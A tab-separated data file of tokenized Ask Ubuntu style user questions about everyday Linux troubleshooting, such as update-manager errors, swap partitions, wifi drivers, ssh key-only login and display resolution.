1 snd drm 302817 4 i915 , drm_kms_helper i2c_algo_bit 13413 1 i915 wmi 19177 1 dell_wmi video 19476 1 i915 mac_hid 13205 0 parport_pc 32701 0 ppdev 17671 0 lp 17759 0 parport 42348 3 lp , ppdev , parport_pc ahci 25819 4 r8169 67581 0 libahci 32168 1 ahci mii 13934 1 r8169 user @ laptop : thank you .
468209	update manager access	e : type 'ain ' is not known on line 3 in source list /etc/apt/sources.list.d/gwendal-lebihan-dev-cinnamon-stable-precise.list e : the list of sources could not be read . i havent been able to use update manager for 6 months now get this message
468210	luminace hdr , qt5	i was installing luminance hdr by using the command cmake src i got error : cmake error at libpfs/cmakelists.txt:15 ( qt5_use_modules ) : unknown cmake command `` qt5_use_modules '' . then i tried to install qt5 modules : sudo apt-add-repository ppa : ubuntu-sdk-team/ppa sudo apt-get update sudo apt-get install qtdeclarative5-dev but still getiing the same error . plese guide me appropriately .
468215	windows 7 in virtual box does n't see any usb devices connected	i virtualbox 4.3 and extension pack installed . i also have an usb filter set up . however , my vm windows 7 does n't see any usb devices connected ( the menu at the bottom says so ) , although everything seems to be set up correctly . what 's the matter ? yes , i saw other questions related to mine but still i do n't realize what i am doing wrong .
468216	hibernation/swap partition	i 'm trying to enable hibernation on my laptop , a dell xps-13 ( with a 256 gb ssd mounted as an encrypted volume ) . i was following the official documentation here and i attempted the `` hibernation test '' by executing sudo pm-hibernate from a command prompt . needless to say it failed , in the sense that the screen went dark for a few seconds and then everything resumed as-was . the documentation mentioned checking whether the swap partition in `` at least as large as available ram '' ( in my case , 8 gb ) . so i typed df and this is what i saw ( i 've made extensive use of tmps in my /etc/fstab to avoid needless grind on the ssd ) : user @ host : ~ $ df filesystem 1k-blocks used available use % mounted on /dev/mapper/ubuntu -- vg-root 237978256 14144120 211722472 7 % / none 4 0 4 0 % /sys/fs/cgroup udev 3829132 4 3829128 1 % /dev tmpfs 3844736 2060 3842676 1 % /tmp tmpfs 768948 1324 767624 1 % /run none 5120 0 5120 0 % /run/lock none 3844736 32312 3812424 1 % /run/shm none 102400 28 102372 1 % /run/user tmpfs 3844736 0 3844736 0 % /var/spool tmpfs 3844736 24 3844712 1 % /var/tmp tmpfs 3844736 936 3843800 1 % /var/log /dev/sda1 240972 84550 143981 37 % /boot /home/user/.private 237978256 14144120 211722472 7 % /home/user user @ host : ~ $ am i right in my diagnosis that i have no swap partition at all ? ? ( i have vm.swappiness set to 0 , if i remember correctly , in case that 's relevant in any way . ) if i 'm right in my diagnosis , how do i go about creating one at this late moment in time ?
468221	flash videos go fullscreen once ( firefox ) , then after minimising it and trying to go fullscreen again it freezes ( ubuntu 14.04 , gnome desktop )	i just made a clean install of ubuntu 14.04 . everything was working fine , the problem is though that after i switched to gnome desktop , i could n't switch to fullscreen mode on flash videos once i already did that ( flash would freeze , but the audio would be playing fine ) . i am using firefox , and i already tried updating to the newest version of flash . i am aware that this question was already asked once here , but i figured since this didnt get answered i would ask again . thanks .
468226	streaming record application	some time ago i was recording streaming radios using an user friendly application . it was able to record without playing , separate files ... unfortunately , i canât remember the name of this application in order to use it in 14.04 . could you help me to find out the name of this application ?
468227	error when updating my new ubuntu 12.04 lts laptop	i have just bought a dell inspiron 3537 with ubuntu 12.04 lts pre-installed . however , update manager can not successfully finish the initial update . here 's part of the log at http : //paste.ubuntu.com/7478635/ . is there any hope ? ? ? ?
468229	creating a swap partition on an ssd with full encryption	much to my surprise i recently found myself to lack a swap partition . since ( as is evident from the output of df , which i hereby repost ) that i am running off a single encrypted volume , i was wondering how i can safely go about resizing everything and creating an 8 gb partition for use as a swap ( and enabling it 's use ) . i seem to remember that the scheme i opted for during installation is luks . user @ host : ~ $ df filesystem 1k-blocks used available use % mounted on /dev/mapper/ubuntu -- vg-root 237978256 14144120 211722472 7 % / none 4 0 4 0 % /sys/fs/cgroup udev 3829132 4 3829128 1 % /dev tmpfs 3844736 2060 3842676 1 % /tmp tmpfs 768948 1324 767624 1 % /run none 5120 0 5120 0 % /run/lock none 3844736 32312 3812424 1 % /run/shm none 102400 28 102372 1 % /run/user tmpfs 3844736 0 3844736 0 % /var/spool tmpfs 3844736 24 3844712 1 % /var/tmp tmpfs 3844736 936 3843800 1 % /var/log /dev/sda1 240972 84550 143981 37 % /boot /home/user/.private 237978256 14144120 211722472 7 % /home/user user @ host : ~ $ i 'm a little out of my depth and i intuit that there 's ample opportunity for disaster so i 'd much appreciate some assistance . ( and , though i would be disappointed if i accidentally nuked the drive , this is just a personal laptop with nothing criticcal on it , so i could always start over ) .
468231	why some wanted packages not pre-installed with ubuntu ?	i am using ubuntu 14.04 . i want to know why some very useful packages not pre-installed with ubuntu ? i am talking about packages like : ubuntu-restricted-extras gstreamer & libavcodecor vlc gksu optional : nautilus-open-terminal , unity-tweak-tool , hardinfo etc . is there any security or legal purpose ? is it not available any-how in feauture ?
468236	how can i find my user id ( uid ) from terminal ?	the title says it all . what command i need to run from a terminal to find my user id ( uid ) ?
468241	how can i ensure a service is disabled on boot ?	for some reason i need to disable a system service on boot . in my case this is the avahi daemon . i just do n't want it to start on boot . in previous ubuntu releases ( e.g . 12.04 ) i could do sudo update-rc.d avahi-daemon disable however on 14.04 it shows update-rc.d : warning : start runlevel arguments ( none ) do not match avahi-daemon default-start values ( 2 3 4 5 ) update-rc.d : warning : stop runlevel arguments ( none ) do not match avahi-daemon default-stop values ( 0 1 6 ) system start/stop links for /etc/init.d/avahi-daemon do not exist . and avahi is started on boot . how can i disable this ? i 'm looking for a command line way of doing this . and please care to explain what happened here ? some change in a recent ubuntu release broke the use of update-rc.d ? i suspect i 'm missing something here .
468247	dmesh equivalent program for ubuntu	any program like dmesh for linux ?
468248	i need to check for dpkg lock before installing apps in a script	i have a problem with a script i wrote to install a bunch of apps , basically as it loops through an array of app names to install it checks them by doing : dpkg -l | grep -q $ i and based on the $ ? will either install or skip the app . trouble is for a few items it fails due to a dpkg lock , almost the whole list works , just half a dozen fail but work if you run the script again . is it possible to wait for dpkg to finish before running the 'apt-get install ' ? for now i 've added a 'sleep 0.5 ' between the 2 lines and this has stopped the problem but is obviously ugly and slower . thanks , noki
468249	how to get maas server url from command line ?	i just wanted to try out maas dashboard so , i have created a maas server on ubuntu server 14.04 in vmware . however , i did not get the prompt for setting server url as http : //10.x.x.x/maas as described here . i tried reinstalling it several times , but never made out till that prompt . the setup then continues as normal till end . so , is there any way to get server url from command line ?
468254	how do i configure a default principal for kinit ( acquiring kerberos ticket ) ?	when using kinit to acquire a kerberos ticket i have configured it to use a default realm , e.g . gert.lan by editing /etc/krb5.conf : [ libdefaults ] default_realm = gert.lan that 's great since i do n't have to supply that all the time on the command line . âť kinit gert @ gert.lan 's password : however , my local username gert does not match the remote username gertvdijk . now i have to supply the full principal name as an argument still . if this is just kinit i could create a bash alias , but more kerberos tools appear to try my local username . for example kredentials does not allow me to use another than default principal . so , basically , what i want is to create a mapping between the local user gert and the remote principal gertvdijk @ gert.lan . ironically , when using a more complicated setup with pam i am able to achieve this . in krb5.conf : [ appdefaults ] pam = { mappings = gert gertvdijk @ gert.lan } but i do n't want to use the kerberos pam module anymore since i 've locked out myself so many times by thinking the kerberos server is n't reachable and i 'm trying to enter the local password ... so , long story short , is there a way to configure a default principal or a mapping from local usernames ?
468257	no wifi on hp spectre under linux secure : solved	i have installed linux secure on hp spectre ultrabook but the beast does n't see the wifi . here are some hints : jacob @ jacob-hp-spectre-13-ultrabook : ~ $ lspci |grep -i network 01:00.0 network controller : intel corporation device 08b1 ( rev 6b ) jacob @ jacob-hp-spectre-13-ultrabook : ~ $ cat /etc/lsb-release distrib_id=ubuntu distrib_release=13.04 distrib_codename=raring distrib_description= '' linux-secure-remix-64bit 20may2013 '' jacob @ jacob-hp-spectre-13-ultrabook : ~ $ lsusb bus 001 device 002 : id 0461:4e3d primax electronics , ltd bus 001 device 003 : id 04f3:0199 elan microelectronics corp . bus 001 device 004 : id 8087:07dc intel corp . bus 002 device 003 : id 05dc : a833 lexar media , inc . bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0003 linux foundation 3.0 root hub _ jacob @ jacob-hp-spectre-13-ultrabook : ~ $ lspci 00:00.0 host bridge : intel corporation haswell-ult dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation haswell-ult integrated graphics controller ( rev 09 ) 00:03.0 audio device : intel corporation device 0a0c ( rev 09 ) 00:14.0 usb controller : intel corporation lynx point-lp usb xhci hc ( rev 04 ) 00:16.0 communication controller : intel corporation lynx point-lp heci # 0 ( rev 04 ) 00:1b.0 audio device : intel corporation lynx point-lp hd audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation lynx point-lp pci express root port 3 ( rev e4 ) 00:1f.0 isa bridge : intel corporation lynx point-lp lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation lynx point-lp sata controller 1 [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation lynx point-lp smbus controller ( rev 04 ) 01:00.0 network controller : intel corporation device 08b1 ( rev 6b ) jacob @ jacob-hp-spectre-13-ultrabook : ~ $ lspci -nn |grep -i net 01:00.0 network controller [ 0280 ] : intel corporation device [ 8086:08b1 ] ( rev 6b ) jacob @ jacob-hp-spectre-13-ultrabook : ~ $ lspci -k 00:00.0 host bridge : intel corporation haswell-ult dram controller ( rev 09 ) subsystem : hewlett-packard company device 1911 00:02.0 vga compatible controller : intel corporation haswell-ult integrated graphics controller ( rev 09 ) subsystem : hewlett-packard company device 1911 kernel driver in use : i915 00:03.0 audio device : intel corporation device 0a0c ( rev 09 ) subsystem : hewlett-packard company device 1911 kernel driver in use : snd_hda_intel 00:14.0 usb controller : intel corporation lynx point-lp usb xhci hc ( rev 04 ) subsystem : hewlett-packard company device 1911 kernel driver in use : xhci_hcd 00:16.0 communication controller : intel corporation lynx point-lp heci # 0 ( rev 04 ) subsystem : hewlett-packard company device 1911 00:1b.0 audio device : intel corporation lynx point-lp hd audio controller ( rev 04 ) subsystem : hewlett-packard company device 1911 kernel driver in use : snd_hda_intel 00:1c.0 pci bridge : intel corporation lynx point-lp pci express root port 3 ( rev e4 ) kernel driver in use : pcieport 00:1f.0 isa bridge : intel corporation lynx point-lp lpc controller ( rev 04 ) subsystem : hewlett-packard company device 1911 kernel driver in use : lpc_ich 00:1f.2 sata controller : intel corporation lynx point-lp sata controller 1 [ ahci mode ] ( rev 04 ) subsystem : hewlett-packard company device 1911 kernel driver in use : ahci 00:1f.3 smbus : intel corporation lynx point-lp smbus controller ( rev 04 ) subsystem : hewlett-packard company device 1911 01:00.0 network controller : intel corporation device 08b1 ( rev 6b ) subsystem : intel corporation device c070 _ jacob @ jacob-hp-spectre-13-ultrabook : ~ $ sudo lshw -c network [ sudo ] password for jacob : *-network unclaimed description : network controller product : intel corporation vendor : intel corporation physical id : 0 bus info : pci @ 0000:01:00.0 version : 6b width : 64 bits clock : 33mhz capabilities : pm msi pciexpress cap_list configuration : latency=0 resources : memory : b0400000-b0401fff _ jacob @ jacob-hp-spectre-13-ultrabook : ~ $ lsmod module size used by usb_storage 57204 1 dm_crypt 22820 0 snd_hda_codec_idt 70256 0 snd_hda_codec_hdmi 36913 1 coretemp 13355 0 kvm_intel 132891 0 kvm 443165 1 kvm_intel joydev 17377 0 hp_wmi 18048 0 sparse_keymap 13890 1 hp_wmi parport_pc 28152 0 ppdev 17073 0 snd_hda_intel 39619 2 iwlwifi 173477 0 snd_hda_codec 136453 3 snd_hda_codec_hdmi , snd_hda_codec_idt , snd_hda_intel snd_hwdep 13602 1 snd_hda_codec snd_pcm 97451 3 snd_hda_codec_hdmi , snd_hda_codec , snd_hda_intel bnep 18036 2 rfcomm 42641 12 uvcvideo 80847 0 videobuf2_vmalloc 13056 1 uvcvideo snd_page_alloc 18710 2 snd_pcm , snd_hda_intel microcode 22881 0 snd_seq_midi 13324 0 snd_seq_midi_event 14899 1 snd_seq_midi snd_rawmidi 30180 1 snd_seq_midi videobuf2_memops 13202 1 videobuf2_vmalloc videobuf2_core 40513 1 uvcvideo hid_multitouch 17366 0 psmouse 95870 0 serio_raw 13215 0 videodev 129260 2 uvcvideo , videobuf2_core btusb 22474 0 bluetooth 228619 22 bnep , btusb , rfcomm lpc_ich 17061 0 snd_seq 61554 2 snd_seq_midi_event , snd_seq_midi cfg80211 510937 1 iwlwifi nls_iso8859_1 12713 2 snd_seq_device 14497 3 snd_seq , snd_rawmidi , snd_seq_midi snd_timer 29425 2 snd_pcm , snd_seq snd 68876 14 snd_hwdep , snd_timer , snd_hda_codec_hdmi , snd_hda_codec_idt , snd_pcm , snd_seq , snd_rawmidi , snd_hda_codec , snd_hda_intel , snd_seq_device mei 41158 0 soundcore 12680 1 snd mac_hid 13205 0 lp 17759 0 parport 46345 3 lp , ppdev , parport_pc usbhid 47074 1 hid_multitouch hid 101002 2 hid_multitouch , usbhid ghash_clmulni_intel 13259 0 aesni_intel 55399 125 aes_x86_64 17255 1 aesni_intel xts 12885 1 aesni_intel lrw 13257 1 aesni_intel gf128mul 14951 2 lrw , xts ablk_helper 13597 1 aesni_intel cryptd 20373 3 ghash_clmulni_intel , aesni_intel , ablk_helper wmi 19070 1 hp_wmi i915 600351 3 video 19390 1 i915 i2c_algo_bit 13413 1 i915 drm_kms_helper 49394 1 i915 drm 286313 4 i915 , drm_kms_helper ahci 25731 2 libahci 31364 1 ahci _ jacob @ jacob-hp-spectre-13-ultrabook : ~ $ iwconfig lo no wireless extensions . _ jacob @ jacob-hp-spectre-13-ultrabook : ~ $ ifconfig lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:640 errors:0 dropped:0 overruns:0 frame:0 tx packets:640 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:52512 ( 52.5 kb ) tx bytes:52512 ( 52.5 kb ) _ jacob @ jacob-hp-spectre-13-ultrabook : ~ $ sudo iwlist scan lo interface does n't support scanning . _ jacob @ jacob-hp-spectre-13-ultrabook : ~ $ uname -r -m 3.8.0-19-generic x86_64 jacob @ jacob-hp-spectre-13-ultrabook : ~ $ cat /etc/network/interfaces # interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) auto lo iface lo inet loopback _ jacob @ jacob-hp-spectre-13-ultrabook : ~ $ nm-tool networkmanager tool state : disconnected _ jacob @ jacob-hp-spectre-13-ultrabook : ~ $ sudo rfkill list 0 : hci0 : bluetooth soft blocked : no hard blocked : no thanks .
468261	how can i change the color of ubuntu touch toolbar ?	here is my situation : does anyone know how to change colour of the bottom toolbar ?
468262	disable matlab focus stealing , without modifying matlab script	i hava matlab script running in the background . it keeps popping up pogress bar windows as the computation progresses . this is very annoying . problem is i did not write the matlab script myself , and it is a very long and complicated piece of code that i do n't want to mess with . so how can i prevent matlab from stealing focus , without modifying the matlab script ? hopefully some ubuntu setting ( i am running xubuntu ) will let me do this .
468264	bug : firefox tab title not readable in radiance theme	i am using ubuntu 14.04 os . i changed my theme to radiance and now i can not see tab title in firefox browser . is this a bug ?
468265	where went ubuntu ( installed along side windows ) after reinstalled windows ?	i had installed ubuntu 12.04 alongside windows 7 ( ultimate ) creating a disk partition of 10 g. i had some problem with windows , i had to format and reinstall it . i used the same partition for windows where it resided before.but now i m not able to see the start screen which i used to see before giving me options to enter in to ubuntu and windows.how shall i get it back ? what has happened to ubuntu partition ? should i re install it ? ( let reinstalling be last possible solution , because i have my good programs created and stored in ubuntu : ( ... . )
468267	lenovo t410 sleep/wakeup issue	i have a problem with my lenovo t410 laptop ; whenever it sleeps or opening the led and the laptop is trying to wake up , the laptop just freezes in the login screen , the only way to fix it is to hard reboot the laptop , please help !
468273	disable thumbnails on xubuntu	i am trying to obtain the highest performance from my xubuntu system , disabling anything that i do n't need . how can i disable thumbnails on xubuntu ?
468277	screen brightness not working in ubuntu 14.04	my lenovo z570 has two gpu 's , nvidia and intell . brightness control has no effect what so ever over the screen brightness , and because i 've had some major issues in the past when i was trying to fiddle with nvidia drivers and settings , and i wan na be cautious now . i have n't find similar questions referring 14.04 lts with similar configuration as mine . i 've read that it could be fixed by adding/changing content in xorg.conf but when i run sudo gedit /etc/x11/xorg.conf the file comes out to be absolutely empty . what do i need to do , what do i need to add to it and not get my laptop screwed with a black screen again ? thank you !
468278	how to troubleshoot logout not working ?	i 'm on trusty and i have been having this annoying problem with logout since 13.x release . it always works hit or miss when i try to logout from the log out menu . when it does n't work , nothing happens to my session . any idea how i can troubleshoot this issue and find out what preventing it to log out ?
468282	guvc video capture commandline	i know how to use the -h option , i just do n't see any commands to start video capture with file incrementation unless i press the video capture button . what is the command line to start video capture guvcview using filename incrementation . the option -n , -- video=filename video file name ( capture from start ) will start video capture , however , the filename is overwritten unless the gui capture button is used .
468283	why do top and lxtask show different degrees of memory usage ?	why does top show 730mb of ram used , but the `` task manager '' shows 190mb ? some more information on my system : lubuntu 14.04 virtualbox screenshots :
468285	pdf viewer/editor	on windows i use adobe acrobat . with that i can create , edit pdf 's or just fill in documents . there are programs available for making/editing pdf but they do n't work that well . so i am hoping you know a good one that has similar functions as acrobat . i would switch to windows right now but my primary notebook is out for repair so i have to do it with my old notebook witch only has ubuntu to try it out and learn a little bit more
468286	old dell inspiron 531 w/ xp . can i run 14.04 ?	i had an old dell inspiron 531 laying around and wanted to do something with it . i decided to make it into a htpc/dvr and light gaming rig ( iracing ) mainly . i was able to find a dual core amd64 xii 6000 125w 3.0ghz cpu for $ 20 ( brand new ) to take the place of the sempron that 's in it now . i added 2 more gigs of ram for a total of 4 . also added 2gb geforce610 graphics card to it , 160gig wd hard drive . now my question is will it run 14.04 or should i go ahead and buy windows 7 ? i will initially dual boot it with the xp pro that 's on it now with hopes that i can eliminate xp all together . thanks for any help . david
468287	can not access 192.168.1.1	i can not access 192.168.1.1 in ubuntu 14.04.i use wireless router tp-link td-w8901g.it worked on windows but it does n't work on ubuntu.any ideas what should i do ? the output of ifconfig is : eth0 link encap : ethernet hwaddr 60 : a4:4c:4e:94 : ab inet6 addr : fe80 : :62a4:4cff : fe4e:94ab/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:47087 errors:0 dropped:0 overruns:0 frame:0 tx packets:49475 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:35977992 ( 35.9 mb ) tx bytes:7791380 ( 7.7 mb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:9663 errors:0 dropped:0 overruns:0 frame:0 tx packets:9663 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:1065746 ( 1.0 mb ) tx bytes:1065746 ( 1.0 mb ) ppp0 link encap : point-to-point protocol inet addr:122.168.19.182 p-t-p:122.168.4.1 mask:255.255.255.255 up pointopoint running noarp multicast mtu:1492 metric:1 rx packets:3493 errors:0 dropped:0 overruns:0 frame:0 tx packets:4238 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:3 rx bytes:911258 ( 911.2 kb ) tx bytes:742138 ( 742.1 kb ) the output of ping 192.168.1.1 is : ping 192.168.1.1 ( 192.168.1.1 ) 56 ( 84 ) bytes of data . from 125.21.0.109 icmp_seq=1 destination net unreachable from 125.21.0.109 icmp_seq=2 destination net unreachable from 125.21.0.109 icmp_seq=3 destination net unreachable from 125.21.0.109 icmp_seq=4 destination net unreachable then it went to infinite loop.i had to interrupt it .
468290	associate playonlinux to microsoft office on ubuntu 14.04	i have installed microsoft office home and student 2010 through playonlinux ( v 4.2.2 ) onto my ubuntu 14.04 distribution . icons were created on my desktop for word and excel . if i click on either icon , i get into the application and create a file without any problems . however , when i click on a .xlsx or .docx file , libre office opens rather than excel or word . i have googled , searched and tried all solutions found and none bring up word or excel when i click a .xlsx or docx file . is there currently a new solution to this problem or some new ideas to try ? i am very new to linux so please go easy on me . hello mitch and thank you for the reply . there are a few things different between what you see and what i see . on your first screen you have options `` resize icon '' and `` restore icon 's original size . '' i do not have these two options . although this does not matter , i 'm just pointing out the difference . on you second screen shot , i do not have microsoft word as an option . also , near the bottom , i do not have the second line from the bottom which on your screen has reset , add , and set as default . my last line is the same as yours , help ( on left ) and close ( on right ) . could there be some sort of version differences between our programs ? i installed using playonlinux . i did not install wine but i noticed that playonlinux did durring the installation . anything i can specifically check for or change ?
468295	( solved ) error : the system is running in low-graphics mode in ubuntu 14.04 samsung np270e4e-k05mx	i 'm trying the distribution ubuntu 14.04 and when i start sometimes appears the error 'the system is running in low graphics mode ' , so i reboot and if i am lucky it will start normally but is annoying be doing that , so what i can do ? . my computer is a samsung np270e4e-k05mx http : //www.samsung.com/mx/consumer/monitor-peripherals-printer/ultra-mobile-pc/ativ-book-performance/np270e4e-k05mx screen : led hd de 14 '' ( 1,366 x 768 ) , antirreflejante graphics : intel速 hd 4000 i put the features of the screen because i think is in it the problem . i 'm a beginner on ubuntu , so i do n't know what the problem is , but i tried some of the solutions in other questions , how to reinstall the ubuntu-desktop or sudo apt-get install fglrx , but it did n't work .
468298	resolution changes after startup/login	i have been trying to use gnome 3.8 / 3.10 / 3.12 since ubuntu gnome 13.10 and no matter what i do it changes the screen resolution to 720p , instead of 1080p , so i have to manually set 1080p every time i start the pc ! card : nvidia gtx 550 driver : all available distro : ubuntu 13.10 / 14.04 gnome shell : 3.8 / 3.10 / 3.12 things i tried so far : opening nvidia-settings as root and user changing settings in nvidia-settings= force powermizer to maximum / opengl settings / quality settings - ( i have done it all ) forcing nvidia-settings to load on startup ( startup aplications ) adding/deleting/changing xorg.conf = `` modes '' / `` metamodes '' / `` display '' / `` edid '' - ( i have done it all ) adding gdm/init = xrandr output dvi-d-0 -- mode installing different kernels = 3.10 / 3.12 / 3.13 / 3.14 installing different nvidia drivers= all available for ubuntu installing lightdm/mdm = everything breaks down changing cables = dvi / hdmi blocking/changing edid = blocking the extensions on edid ( maybe the hdmi sound was causing the problem ) / `` noedid '' - system looses all resolutions what i learned so far : whenever i try to force 1080p by adding a command to xorg/gdm/xrandr the screen changes to 1080p for 1sec and then goes back to 720p ! ... : ( tested xubuntu/kubuntu 14.04 = no resolution problems , just the usual terrible nvidia performance ( no vsync , no vdpau ) just installed linux mint yesterday and this problem does n't happen ( mdm ) , 1080p since the login screen . tested gnome 3.10/3.12 on the latest fedora / suse / antergos and the problem persists ! possible causes : xserver 3.15 / 3.13 = i tried to replace ubuntu 14.04 xserver ( 3.15 ) with ubuntu 12.02 ( 3.13 ) cheating the repos and the whole system melted down ! i really want gnome 3 and a supported version of ubuntu ( i am stuck at 13.04 ) ! i am very persistent and have problems taking no for an answer ! i had an ati hd 4x series and i saved money to buy this nvidia because gaming on linux became impossible ( missing gl extensions on legacy drivers ) ... so ... . thinking that it would solve all the video issues i had on linux with ati ... but ... how wrong was i ? ? ? ? now i have problems with basic functionalities ( resolution / vsync / vdpau ) ! ... .i started using linux 3 years ago and all these gpus mess have been a nightmare in my linux experience ! ... .it 's what makes me think about giving up linux for all !
468299	ssh server : allow only login with key	i know , this question has been ask several times . but im trying to setup a ssh server . i thought the critical setting is that i have to set passwordauthentication no . but i already did so and rebooted the machine . but im still able to login with my local username and password . please find attached my sshd_config file # package generated configuration file # see the sshd_config ( 5 ) manpage for details # what ports , ips and protocols we listen for port 22 # use these options to restrict which interfaces/protocols sshd will bind to # listenaddress : : # listenaddress 0.0.0.0 protocol 2 # hostkeys for protocol version 2 hostkey /etc/ssh/ssh_host_rsa_key hostkey /etc/ssh/ssh_host_dsa_key hostkey /etc/ssh/ssh_host_ecdsa_key hostkey /etc/ssh/ssh_host_ed25519_key # privilege separation is turned on for security useprivilegeseparation yes # lifetime and size of ephemeral version 1 server key keyregenerationinterval 3600 serverkeybits 1024 # logging syslogfacility auth loglevel info # authentication : logingracetime 120 permitrootlogin without-password strictmodes yes rsaauthentication yes pubkeyauthentication yes authorizedkeysfile % h/.ssh/authorized_keys # do n't read the user 's ~/.rhosts and ~/.shosts files ignorerhosts yes # for this to work you will also need host keys in /etc/ssh_known_hosts rhostsrsaauthentication no # similar for protocol version 2 hostbasedauthentication no # uncomment if you do n't trust ~/.ssh/known_hosts for rhostsrsaauthentication # ignoreuserknownhosts yes # to enable empty passwords , change to yes ( not recommended ) permitemptypasswords no # change to yes to enable challenge-response passwords ( beware issues with # some pam modules and threads ) challengeresponseauthentication no # change to no to disable tunnelled clear text passwords passwordauthentication no # kerberos options # kerberosauthentication no # kerberosgetafstoken no # kerberosorlocalpasswd yes # kerberosticketcleanup yes # gssapi options # gssapiauthentication no # gssapicleanupcredentials yes x11forwarding yes x11displayoffset 10 printmotd no printlastlog yes tcpkeepalive yes # uselogin no # maxstartups 10:30:60 # banner /etc/issue.net # allow client to pass locale environment variables acceptenv lang lc_* subsystem sftp /usr/lib/openssh/sftp-server # set this to 'yes ' to enable pam authentication , account processing , # and session processing . if this is enabled , pam authentication will # be allowed through the challengeresponseauthentication and # passwordauthentication . depending on your pam configuration , # pam authentication via challengeresponseauthentication may bypass # the setting of `` permitrootlogin without-password '' . # if you just want the pam account and session checks to run without # pam authentication , then enable this but set passwordauthentication # and challengeresponseauthentication to 'no ' . usepam yes
468304	touch-pad swipe guestures	is there any way to get the 2 finger swipe to scroll gesture in ubuntu ? it was present in windows 8.1 before i switched to ubuntu . i am using the new lenove ideapad z510 laptop .
468305	get program to catch signal after wake from suspend ?	i 'm running a program ( specifically oscam ) that interfaces with a serial reader on a usb port . however , the tty device file that the usb device gets assigned to differs and , in particular , changes when the system wakes up from suspend . i 've created a udev rule so as to assign a consistent tty device symlink to the serial reader . this worked out fine , and i can now always access it under the same name . this allowed me to include the symlinked name rather than the actual device name in the config file , so that i did not have to change it every other re-plug . however , the program seems to resolve this to symlink the actual device tty upon loading its configurations . this means that , as long as the program is running , it will not re-resolve the alias when trying to access the device . now here 's my issue ; when i wake my computer from suspend , the program is still running and thus does not resolve the now changed symlink . it works fine when i then kill off the program and start it back up . a possible solution would of course be to include this killing and restarting of the program in /etc/pm/sleep.d/ , but this feels hacky , and i would like to share my fix back into the upstream . my question is thus ; is there some kind of signal that is fired when my system wakes from suspend , and can i catch that signal ? i would then get the program to re-resolve the link specified in the configuration file .
468307	terminal with messed up characters	my terminal is displaying messed up characters . i already restarted my computer , but it is n't fixed . here 's a sample of the output from pstree . any idea of why this happens ?
468308	why `` there are .debs in this upload , and enforcing they do n't exist . '' when i try to upload package to a ppa ?	i 'm trying to upload some package that i build using debuild to a ppa , but it fails with the following : dput ppa : braiampe/ffc ffc_1.3.20140513-1_i386.changes uploading ffc using ftp to ppa ( host : ppa.launchpad.net ; directory : ~braiampe/ffc/ubuntu ) running supported-distribution : check whether the target distribution is currently supported ( using distro-info ) { u'known ' : [ u'release ' , u'proposed ' , u'updates ' , u'backports ' , u'security ' ] , u'allowed ' : [ u'release ' ] } running checksum : verify checksums before uploading running suite-mismatch : check the target distribution for common errors running check-debs : makes sure the upload contains a binary package there are .debs in this upload , and enforcing they do n't exist . how can i upload the sources to the ppa ?
468313	why is fluendo playback kit not detected	i needed to play several media formats . mp3 , mpg ( video and audio ) , flv , avi , any and all media files so i installed the fluendo complete kit and yet ubuntu 14 still on some of my files wants to install from multiverse . i paid for fluendo as a legal alternative but i am considering just returning to windows as just to be able to listen to music i legitimately paid .
468314	random shutoffs while using nvidia driver	i 'm running 14.04 and i have an nvidia gt540m . works fine with intel graphics , but suffers from random shutoffs while using nvidia drivers ( and has done so over a few reinstalls/upgrades ) . i pulled this from my dmesg : [ 30.621159 ] snd_hda_intel 0000:00:1b.0 : irq 45 for msi/msi-x [ 30.621538 ] nvidia : module license 'nvidia ' taints kernel . [ 30.621541 ] disabling lock debugging due to kernel taint [ 30.625168 ] nvidia : module verification failed : signature and/or required key missing - tainting kernel [ 30.629681 ] nvidia 0000:01:00.0 : enabling device ( 0000 - > 0003 ) [ 30.629757 ] vgaarb : device changed decodes : pci:0000:01:00.0 , olddecodes=io+mem , decodes=none : owns=none [ 30.629900 ] [ drm ] initialized nvidia-drm 0.0.0 20130102 for 0000:01:00.0 on minor 1 [ 30.629906 ] nvrm : loading nvidia unix x86_64 kernel module 331.38 wed jan 8 19:32:30 pst 2014 [ 30.633518 ] sku : nid=0x1d sku_cfg=0x40079a2d [ 30.633520 ] sku : port_connectivity=0x1 [ 30.633521 ] sku : enable_pcbeep=0x0 [ 30.633522 ] sku : check_sum=0x00000007 [ 30.633523 ] sku : customization=0x0000009a [ 30.633524 ] sku : external_amp=0x5 [ 30.633525 ] sku : platform_type=0x1 [ 30.633526 ] sku : swap=0x0 [ 30.633527 ] sku : override=0x1 anyway , here 's 2 versions of dmesg and my syslog . can anyone figure out what 's going on ? dmesg.0 , dmesg , syslog
